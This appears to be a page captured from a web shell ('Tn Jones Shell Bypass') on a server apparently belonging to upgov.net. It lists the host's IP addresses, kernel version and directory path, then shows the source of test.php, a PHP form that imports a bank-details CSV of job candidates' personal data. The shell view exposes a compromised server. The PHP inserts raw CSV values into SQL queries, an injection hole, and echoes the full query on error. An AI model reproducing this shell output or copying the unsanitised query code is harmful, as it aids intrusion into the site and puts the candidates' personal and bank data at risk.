Tn Jones Shell Bypass
:
3.144.40.90
:
160.187.54.56 / upgov.net
:
Linux 160-187-54-56.cprapid.com 4.18.0-553.22.1.lve.1.el7h.x86_64 #1 SMP Tue Oct 8 14:36:03 UTC 2024 x86_64
:
/
home
/
upgov
/
www
/
registrationform
/
Upload File:
files >> /home/upgov/www/registrationform/test.php
<html> <head> <style type="text/css"> body { margin: 0; padding: 0; background-color:#D6F5F5; text-align:center; } .top-bar { width: 100%; height: auto; text-align: center; background-color:#FFF; border-bottom: 1px solid #000; margin-bottom: 20px; } .inside-top-bar { margin-top: 5px; margin-bottom: 5px; } .link { font-size: 18px; text-decoration: none; background-color: #000; color: #FFF; padding: 5px; } .link:hover { background-color: #9688B2; } </style> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-60962033-1', 'auto'); ga('send', 'pageview'); </script> </head> <body> <div class="top-bar"> <h3>UPLOAD BANK SHEET</h3> </div> <div style="border:1px dashed #333333; width:300px; margin:0 auto; padding:10px;"> <form name="import" method="post" enctype="multipart/form-data"> <input type="file" name="file" /><br /> <input type="submit" name="submit" value="Submit" /> </form> <?php include ("connection.php"); if(isset($_POST["submit"])) { $file = $_FILES['file']['tmp_name']; $handle = fopen($file, "r"); $c = 0; while(($filesop = fgetcsv($handle, 1000, ",")) !== false) { $ramvalue=$filesop[0]; $deptname=$filesop[1]; $scheme=$filesop[2]; $postname=$filesop[3]; $district1=$filesop[4]; $postingloc=$filesop[5]; $location_name=$filesop[6]; $candidatename=$filesop[7]; $fathername=$filesop[8]; $category=$filesop[9]; $selection_cate=$filesop[10]; $gender=$filesop[11]; $dob=$filesop[12]; $age=$filesop[13]; $peraddress=$filesop[14]; $percity=$filesop[15]; $Email_Id=$filesop[16]; $mobile_no=$filesop[17]; $mobile_no2=$filesop[18]; $bank=$filesop[19]; $accountno=$filesop[20]; $ifsc=$filesop[21]; $branchcode=$filesop[22]; $highroll=$filesop[23]; $high=$filesop[24]; $subhigh=$filesop[25]; $boardhigh=$filesop[26]; $yearhigh=$filesop[27]; $totalhigh=$filesop[28]; $Mohigh=$filesop[29]; $Divhigh=$filesop[30]; $inter=$filesop[31]; $subinter=$filesop[32]; $boardinter=$filesop[33]; $yearinter=$filesop[34]; $totalinter=$filesop[35]; $Mointer=$filesop[36]; $Divinter=$filesop[37]; $UG=$filesop[38]; $subug=$filesop[39]; $boardug=$filesop[40]; $yearug=$filesop[41]; $totalug=$filesop[42]; $Moug=$filesop[43]; $Divug=$filesop[44]; $PG=$filesop[45]; $subpg=$filesop[46]; $boardpg=$filesop[47]; $yearpg=$filesop[48]; $totalpg=$filesop[49]; $Mopg=$filesop[50]; $Divpg=$filesop[51]; $computercourse=$filesop[52]; $course_inst=$filesop[53]; $duration=$filesop[54]; $companyexp=$filesop[55]; $postexp=$filesop[56]; $totexp=$filesop[57]; $documentupload=$filesop[58]; $filedate=$filesop[59]; $text1=$filesop[60];$text2=$filesop[61]; $text3=$filesop[62];$text4=$filesop[63]; $text5=$filesop[64];$text6=$filesop[65];$text7=$filesop[66]; $text8=$filesop[67]; $text9=$filesop[68]; $sql = mysql_query("insert into bastiapp(Reg_id, Department, Scheme, Postname, District1,Postingloc,Location_name,candidatename, fathername, category,selection_cate, gender, dob, totalage, peraddress, perdistrict, email, mobileno, mobileno2, Bank, Accountno, IFSC, Branchcode, highschoolroll, highschool, sub_high, board_high, year_high, total_high, min_high, per_high, inter, sub_inter, board_inter, year_inter, total_inter, min_inter, per_inter, graduate, sub_ug, univ_ug, year_ug, total_ug, min_ug, per_ug, postgraduate, sub_pg, univ_pg, year_pg, total_pg, min_pg, per_pg, computercourse, course_insititute, courseduration, companyname, Dpost, Txp, Documentupload, created_date ,text1,text2,text3,text4,text5,text6,text7,text8,text9) values ('$ramvalue',UPPER('$deptname'),UPPER('$scheme'),UPPER('$postname'),UPPER('$district1'),UPPER('$postingloc'),UPPER('$location_name'),UPPER('$candidatename'),UPPER('$fathername'),UPPER('$category'),UPPER('$selection_cate'),UPPER('$gender'),UPPER('$dob'),UPPER('$age'),UPPER('$peraddress'),UPPER('$percity'),UPPER('$Email_Id'),UPPER('$mobile_no'),UPPER('$mobile_no2'),UPPER('$bank'),UPPER('$accountno'),UPPER('$ifsc'),UPPER('$branchcode'),UPPER('$highroll'),UPPER('$high'),UPPER('$subhigh'),UPPER('$boardhigh'),UPPER('$yearhigh'),UPPER('$totalhigh'),UPPER('$Mohigh'),UPPER('$Divhigh'),UPPER('$inter'),UPPER('$subinter'),UPPER('$boardinter'),UPPER('$yearinter'),UPPER('$totalinter'),UPPER('$Mointer'),UPPER('$Divinter'),UPPER('$UG'),UPPER('$subug'),UPPER('$boardug'),UPPER('$yearug'),UPPER('$totalug'),UPPER('$Moug'),UPPER('$Divug'),UPPER('$PG'),UPPER('$subpg'),UPPER('$boardpg'),UPPER('$yearpg'),UPPER('$totalpg'),UPPER('$Mopg'),UPPER('$Divpg'),UPPER('$computercourse'),UPPER('$course_inst'),UPPER('$duration'),UPPER('$companyexp'),UPPER('$postexp'),UPPER('$totexp'),'$documentupload','$filedate','$text1','$text2','$text3','$text4','$text5','$text6','$text7','$text8','$text9');"); $c = $c + 1; } if($sql){ echo "You database has imported successfully. You have inserted ". $c ." recoreds"; }else{ echo "Sorry! There is some problem.<br><br>insert into bastiapp(Reg_id, Department, Scheme, Postname, District1,Postingloc,Location_name,candidatename, fathername, category,selection_cate, gender, dob, totalage, peraddress, perdistrict, email, mobileno, mobileno2, Bank, Accountno, IFSC, Branchcode, highschoolroll, highschool, sub_high, board_high, year_high, total_high, min_high, per_high, inter, sub_inter, board_inter, year_inter, total_inter, min_inter, per_inter, graduate, sub_ug, univ_ug, year_ug, total_ug, min_ug, per_ug, postgraduate, sub_pg, univ_pg, year_pg, total_pg, min_pg, per_pg, computercourse, course_insititute, courseduration, companyname, Dpost, Txp, Documentupload, created_date ,text1,text2,text3,text4,text5,text6,text7,text8,text9) values ('$ramvalue',UPPER('$deptname'),UPPER('$scheme'),UPPER('$postname'),UPPER('$district1'),UPPER('$postingloc'),UPPER('$location_name'),UPPER('$candidatename'),UPPER('$fathername'),UPPER('$category'),UPPER('$selection_cate'),UPPER('$gender'),UPPER('$dob'),UPPER('$age'),UPPER('$peraddress'),UPPER('$percity'),UPPER('$Email_Id'),UPPER('$mobile_no'),UPPER('$mobile_no2'),UPPER('$bank'),UPPER('$accountno'),UPPER('$ifsc'),UPPER('$branchcode'),UPPER('$highroll'),UPPER('$high'),UPPER('$subhigh'),UPPER('$boardhigh'),UPPER('$yearhigh'),UPPER('$totalhigh'),UPPER('$Mohigh'),UPPER('$Divhigh'),UPPER('$inter'),UPPER('$subinter'),UPPER('$boardinter'),UPPER('$yearinter'),UPPER('$totalinter'),UPPER('$Mointer'),UPPER('$Divinter'),UPPER('$UG'),UPPER('$subug'),UPPER('$boardug'),UPPER('$yearug'),UPPER('$totalug'),UPPER('$Moug'),UPPER('$Divug'),UPPER('$PG'),UPPER('$subpg'),UPPER('$boardpg'),UPPER('$yearpg'),UPPER('$totalpg'),UPPER('$Mopg'),UPPER('$Divpg'),UPPER('$computercourse'),UPPER('$course_inst'),UPPER('$duration'),UPPER('$companyexp'),UPPER('$postexp'),UPPER('$totexp'),'$documentupload','$filedate','$text1','$text2','$text3','$text4','$text5','$text6','$text7','$text8','$text9');"; } } ?> </div> <hr style="margin-top:300px;" /> <div align="center" style="font-size:18px;"><a href="http://ramaipl.com">© RAMA INFOTECH PVT LTD</a></div> </body> </html>